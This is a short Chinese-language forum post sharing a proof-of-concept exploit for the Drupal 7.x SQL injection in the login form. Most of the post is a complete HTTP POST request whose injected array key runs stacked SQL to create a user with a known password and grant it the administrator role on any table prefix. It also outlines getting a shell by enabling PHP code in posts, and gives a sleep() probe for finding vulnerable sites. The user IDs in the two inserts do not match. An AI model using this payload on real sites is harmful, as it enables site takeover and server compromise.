Drupal 7.x Sqli 无视表前缀版poc

admin

漏洞原理drops已有,数组拼接sql语句时key注入,由于pdo_mysql可执行多条sql语句。GetShell 也很简单,添加支持php语法,发文章直接写php代码。
看到很多人在讨论有表前缀怎么执行sql,发个无视表前缀的添加管理员poc

1. POST /cms/drupal/drupal7/ HTTP/1.1
   
2. Host: 127.0.0.1
   
3. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
   
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   
5. Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
   
6. Accept-Encoding: gzip, deflate
   
7. Connection: keep-alive
   
8. Content-Type: application/x-www-form-urlencoded
   
9. Content-Length: 294
   
10. 
    
11. name[0%20;insert+into+{users}+(uid,name,pass,status)+values+(333333,'tes3333','$S$DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y',1);insert+into+{users_roles}+(uid,rid)+values(999999999,3);#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

复制代码

密码 testss,users 用 {users}代替 ,就和dedecms sql语句中的#@__members,检测可以使用 select sleep(999999999999999999999999)。